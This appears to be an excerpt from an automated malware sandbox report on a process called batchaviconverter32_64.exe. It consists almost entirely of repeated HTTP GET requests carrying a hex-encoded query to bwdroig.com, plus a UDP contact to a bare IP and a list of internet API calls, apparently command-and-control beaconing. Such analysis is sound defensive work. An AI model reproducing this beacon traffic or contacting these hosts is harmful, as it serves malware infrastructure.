        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: unknownUDP traffic detected without corresponding DNS query: 141.98.234.31
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exeCode function: 3_2_02D872A7 Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,_memset,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,_memset,_memset,_memset,_malloc,_memset,_strtok,_swscanf,_strtok,_free,Sleep,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_memset,_free,3_2_02D872A7
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
